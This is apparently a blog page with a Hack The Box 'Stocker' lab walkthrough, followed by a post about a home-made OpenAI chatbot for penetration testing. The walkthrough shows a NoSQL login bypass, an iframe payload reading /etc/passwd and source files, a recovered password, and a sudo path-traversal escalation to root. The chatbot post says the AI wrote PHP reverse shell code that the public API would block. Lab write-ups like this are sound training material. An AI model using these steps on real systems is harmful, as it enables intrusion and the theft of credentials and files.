------------------------------------------------------------
Threader3000 recommends the following Nmap scan:
************************************************************
nmap -p22,80 -sV -sC -T4 -Pn -oA 10.10.11.196 10.10.11.196
************************************************************
Would you like to run Nmap or quit to terminal?
------------------------------------------------------------
1 = Run suggested Nmap scan
2 = Run another Threader3000 scan
3 = Exit to terminal
------------------------------------------------------------
Option Selection: 1
nmap -p22,80 -sV -sC -T4 -Pn -oA 10.10.11.196 10.10.11.196
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 12:08 JST
Nmap scan report for 10.10.11.196
Host is up (0.19s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3d12971d86bc161683608f4f06e6d54e (RSA)
|   256 7c4d1a7868ce1200df491037f9ad174f (ECDSA)
|_  256 dd978050a5bacd7d55e827ed28fdaa3b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://stocker.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.89 seconds
------------------------------------------------------------
Combined scan completed in 0:01:40.621978

Port 80 is open.

Enumerating and found no robots.txt.
There is a 302 redirect on the standard port.

Added socker.htb to /etc/hosts

Ran gobuster and found a dev.stocker.htb which I also added to /etc/hosts.

I found a bug against the current version of nginx 1.18.0 that this is using, but for some reason it wasn’t working properly and the machine became unstable so I requested a reboot.

Burpsuite and NOSQL Injection

I decided to enum a little further and found that there was a vulnerability to NOSQL as found in BurpSuite.

Changing the content-type to json and putting a nosql bypass:

{"username":{"$ne":"corisan"},"password":{"$ne":"corisan"}}

After forwarding the packet from BurpSuite, this gets a login becuase the express evaluates to true, and we now show items on the website. If we click on an item, add it to the cart, and then add an iframe into the captured packet to show us /etc/passwd, it will give us a list of users.

Now we Add to Basket and Checkout

Embedding an iframe with path to the passwd file:

"title":"<iframe src=file:///etc/passwd height=500px width=500px></iframe>",

Embed File in an iFrame before submitting via BurpSuite

Adding the above captured _id to /api/po/ID to the site gives us the captured iframe data which is actually the contents of the /etc/passwd file:

Post Submit via BurpSuite gets us contents of /etc/passwd file.

Now we have a possible username of angoose. Remember we are looking for a non system account and one with a shell such as /bin/bash. The others just show /bin/false or /usr/sbin/nologin so those are unusable for our purpose.

Now we can the same trick to grab the site’s index.js so we can find a password.

BurpSuite iFrame injection to get contents of index.js

After Submitting Item w/ modified iFrame in BurpSuite we get the content of index.js as the Item

So now we have the password too IHeardPassphrasesArePrettySecure thanks to the coder hardcoding it into the script because they had not yet created any kind of dotevn environment or secrets database to store it in.

As an asside, a trick that coders will user is to obfuscate passwords to applications. That is to take a password and base64 encode it and store that in a file. Then read it from the application, run a base64 -d operation on it to show the true password and use it from a variable in the script. This keeps from storing the password in the script. One of the first things I like to do when enumerating for information/passwords is to see if I can find any base64 encoded files in the system.

I wrote a tool to help you scan for these kinds of base64 encoded files here on my github: https://github.com/c0ri/b64scan

SSH and First Flag

ssh angoose@10.10.11.196                                   
The authenticity of host '10.10.11.196 (10.10.11.196)' can't be established.
ED25519 key fingerprint is SHA256:jqYjSiavS/WjCMCrDzjEo7AcpCFS07X3OLtbGHo/7LQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.196' (ED25519) to the list of known hosts.
angoose@10.10.11.196's password: 

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

angoose@stocker:~$ who
angoose  pts/0        2023-01-30 04:31 (10.10.14.11)
angoose@stocker:~$ id
uid=1001(angoose) gid=1001(angoose) groups=1001(angoose)
angoose@stocker:~$ ls
user.txt
angoose@stocker:~$ cat user.txt
bce30eb254c192b18a0390a2d121822d

So I see from running sudo -l that we only have permission to run /usr/bin/node and only from /usr/local/scripts. First, let’s throw together a little .js script to read /root/root.txt file and see if we can get the system flag that way.

// -- getroot.js
const fs = require('fs');

fs.readFile('/root/root.txt', 'utf8', (err, data) => {
        if (err) {
                console.error(err);
                return;
        }
        console.log(data);
});

Now we will run it, but I use a trick to escape the /usr/local/scripts directory by just appending ../../../home/angoose/

This puts us in the correct directory to call our script from our home while still satifisfying the requirements to run the script from /usr/local/scripts, as that is where the starting path is.

angoose@stocker:~$ sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/getroot.js 
7383fc4bc3af1080ba3815cd4beba4d9

Review

I had some intial challenges with not being able to load the site. After that I had some instability which forced me to have to request a restart on the box after running some vulnerability against nginx.

I finally had better luck just doing some poking around with Burpsuite. Once I got on the box it was quite easy to get the system flag.

Fun Level: 7/10
Initial Difficulty: 4/10
Secondary Difficulty: 4/10

Like what I do? Buy me a coffee! https://www.buymeacoffee.com/c0ri

Isis OpenAI Chatbot for Penetration Testing

It seems that I will be having some more time to work on my personal projects and also working towards my OSCP because I quit my job. I will be looking for a new gig after some needed time off, but in the meantime I’m excited to continue my studies with Penetration Testing as well as doing some coding projects that I’ve been wanting to either finish or start.

I’ve added some code to the Isis OpenAI Chatbot for Penetration Testing. This is more how I envisioned it working as a hands-free way to interact with me. There are still some quirks going on with the OpenAI that I’ve found and I will touch on these.

First, I named this project as I mentioned after the Star Trek series episode Assignment Earth’s Isis character. There was an AI that wa able to work with a character called Gary Seven to save the planet. In that light, I really added a lot of fluff to the AI code. You can tweak it to your liking. I’d also add that some of the code such as the history and training questions can and probably should be tweaked. If you re-inject those with every question, you will probably eat up tokens and money fast. So please be aware of that.

For the next things I want to do, I need to add some ability for Isis to save things like Injections, snipets and code into either files or into my working flow. To be honest when I started this project I was so shocked that Isis actually generated some totally unique reverse shell code for me in php. I had thought maybe it would look it up on the internet and post me something. It actually coded something! Interestingly I could not get the same result using the playground as the public API seems to block ‘dangerous’ code. I’m not sure how concessions would be made for legitimate penetration testers.

Isis OpenAI Chatbot for Penetration Testing is something really cool. As far as I know it was the 1st of it’s kind. This was released and within weeks, I saw other cool apps from others to follow like Github’s Copilot, which to my mind is super cool, and similar to how I envisioned Isis to begin with except I would like the choice to save code/snippets/scripts into places of my choosing.

Anyway, play around with it and see what you think. If you have any suggestions for improvements or wish to contribute, then go for it. You can find the code on my Github here:

https://github.com/c0ri/isis

" title="SkyBlue Software" rel="home">SkyBlue Software

Custom WordPress Plugins, Social Media Tools & More